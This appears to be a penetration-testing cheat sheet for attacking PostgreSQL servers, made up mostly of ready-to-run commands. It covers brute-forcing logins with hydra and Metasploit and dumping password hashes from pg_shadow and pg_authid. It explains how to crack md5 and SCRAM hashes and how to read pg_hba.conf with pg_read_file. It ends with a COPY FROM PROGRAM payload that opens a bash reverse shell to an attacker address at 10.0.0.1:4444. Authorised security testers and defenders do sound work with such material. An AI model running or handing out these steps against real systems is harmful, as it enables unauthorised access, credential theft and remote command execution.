PostgreSQL is an open-source relational database management system. The default port is 5432/TCP.
Enumeration
```sh
# pgsql-brute tries default/common credentials against the service
nmap --script pgsql-brute -p 5432 <target-ip>
```
Brute Force Credentials
```sh
# Single username, password list
hydra -l username -P passwords.txt <target-ip> postgres
# Username list, single password
hydra -L usernames.txt -p password <target-ip> postgres

# Metasploit
msfconsole
msf> use auxiliary/scanner/postgres/postgres_login
msf> set rhosts <target-ip>
msf> run
```
Dump User Hashes
```sh
# Requires valid credentials; reading pg_shadow needs a superuser role
msfconsole
msf> use auxiliary/scanner/postgres/postgres_hashdump
msf> set rhosts <target-ip>
msf> set username <username>
msf> set password <password>
msf> run
```
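The Metasploit module above is a wrapper around a query on the `pg_shadow` catalog. If you already have a `psql` session, the following SQL (an added example, not from the original page or from Metasploit) dumps the same data and shows how to tell which hash format you are dealing with. `pg_shadow` is readable only by superusers; `pg_roles` is readable by any role.

```sql
-- Hashes of every role that has a password set. passwd is NULL for roles
-- without a password (e.g. peer/trust-only accounts).
SELECT usename, passwd, valuntil, usesuper
FROM pg_shadow
WHERE passwd IS NOT NULL
ORDER BY usesuper DESC, usename;

-- Same column under a different name, for servers where pg_shadow is hidden
-- behind an extension or a view (still superuser-only).
SELECT rolname, rolpassword
FROM pg_authid
WHERE rolcanlogin AND rolpassword IS NOT NULL;

-- Readable by any role: who can log in, who is superuser. Useful when we are
-- not superuser and cannot read the hashes themselves.
SELECT rolname, rolsuper, rolcanlogin
FROM pg_roles
WHERE rolcanlogin
ORDER BY rolsuper DESC, rolname;

-- The hash format was fixed when each password was set, according to this
-- setting (default md5 up to PostgreSQL 13, scram-sha-256 from 14 on):
--   md5<32 hex chars>                                   -> md5(password || username)
--   SCRAM-SHA-256$<iterations>:<salt>$<StoredKey>:<ServerKey>
SHOW password_encryption;
```

For the `md5...` form, strip the `md5` prefix and feed `hash:username` to hashcat mode 12 (PostgreSQL); the salt is the username, so the same password gives different hashes for different users. SCRAM-SHA-256 hashes are iterated (4096 rounds by default) and crack far more slowly; a mixed server (some roles still on md5 after an upgrade) is common and worth checking for.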
Config File
```sh
# Debian/Ubuntu package layout; pg_hba.conf and pg_ident.conf sit in the same directory
# Version 14.x
/etc/postgresql/14/main/postgresql.conf
# Version 15.x
/etc/postgresql/15/main/postgresql.conf
```
Other locations can be found from the server process's environment variables, which are prefixed with PG (PGDATA points at the data directory; PGHOST, PGPORT, PGUSER and PGPASSWORD are libpq client defaults that may also leak credentials). Inside an authenticated session, SHOW config_file, SHOW hba_file and SHOW data_directory give the real paths without guessing a version, but viewing these settings requires superuser or membership in pg_read_all_settings.
Connect with psql
```sh
# -W: Force a password prompt
psql -h <target-ip> -p <target-port> -d <database> -U <username> -W
# -w: Never prompt for a password (uses PGPASSWORD or ~/.pgpass if set)
psql -h <target-ip> -p <target-port> -d <database> -U <username> -w
```
Commands in psql
```sql
-- Print help
\?
-- Print the version of PostgreSQL
select version();
-- Display command history
\s
-- List databases
\l
-- Switch to the given database
\c <database_name>
-- List tables
\dt
-- Describe the table information
\d <table_name>
-- Get values in the table
select * from <table>;
-- List all users (roles)
\du
-- Exit psql shell
\q
```
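Before trying to read files or run commands, it pays to establish what the current role is allowed to do and where the server keeps its files; this answers the "Config File" question above without guessing a versioned path. The following SQL is an added example (not from the original page), written for PostgreSQL 10 and later; on older servers the `pg_*` default roles do not exist and the membership query simply returns no rows.

```sql
-- Who am I, and am I superuser? (readable by any role)
SELECT version();
SELECT current_user, session_user, current_database(),
       current_setting('is_superuser') AS is_superuser;

-- Role attributes for every role; pg_roles is world-readable (no hashes in it).
SELECT rolname, rolsuper, rolcreaterole, rolcreatedb, rolcanlogin,
       rolreplication, rolbypassrls
FROM pg_roles
ORDER BY rolsuper DESC, rolname;

-- Default roles the current user is a member of. The ones that matter for
-- post-exploitation:
--   pg_read_server_files  / pg_write_server_files  -> COPY ... FROM/TO '<file>'
--   pg_execute_server_program                      -> COPY ... FROM/TO PROGRAM
--   pg_read_all_settings                           -> SHOW config_file etc.
SELECT r.rolname AS member_of
FROM pg_auth_members m
JOIN pg_roles r ON r.oid = m.roleid
JOIN pg_roles u ON u.oid = m.member
WHERE u.rolname = current_user;

-- Where the server keeps its files (superuser or pg_read_all_settings).
SHOW data_directory;
SHOW config_file;
SHOW hba_file;
SHOW listen_addresses;

-- Client-authentication rules as the server parsed them (superuser only).
SELECT line_number, type, database, user_name, address, auth_method
FROM pg_hba_file_rules;

-- Or the raw file, if we have superuser or pg_read_server_files.
SELECT pg_read_file(current_setting('hba_file'));
```

A `trust` or `peer` entry in `pg_hba.conf` that applies to a local socket, or an `md5` entry for `all` on `0.0.0.0/0`, is frequently the real finding here; `rolsuper = true` on an account whose password was just brute-forced is what makes the command-execution step below possible.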
To execute arbitrary OS commands, use COPY ... FROM PROGRAM, available since PostgreSQL 9.3. The command runs on the database server as the OS user that owns the postgres process (normally postgres), and requires either the superuser role or, on PostgreSQL 11 and later, membership in pg_execute_server_program. Below we spawn a reverse shell, so start a listener (e.g. nc -lvnp 4444) on the attacking machine first and replace 10.0.0.1:4444 with its address. Note that COPY blocks until the program exits, so the psql session hangs for as long as the reverse shell is alive; also note that the psql meta-command \! runs a command on the client, not on the server, and is not a substitute.
```sql
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"';
SELECT * FROM cmd_exec;
DROP TABLE IF EXISTS cmd_exec;
```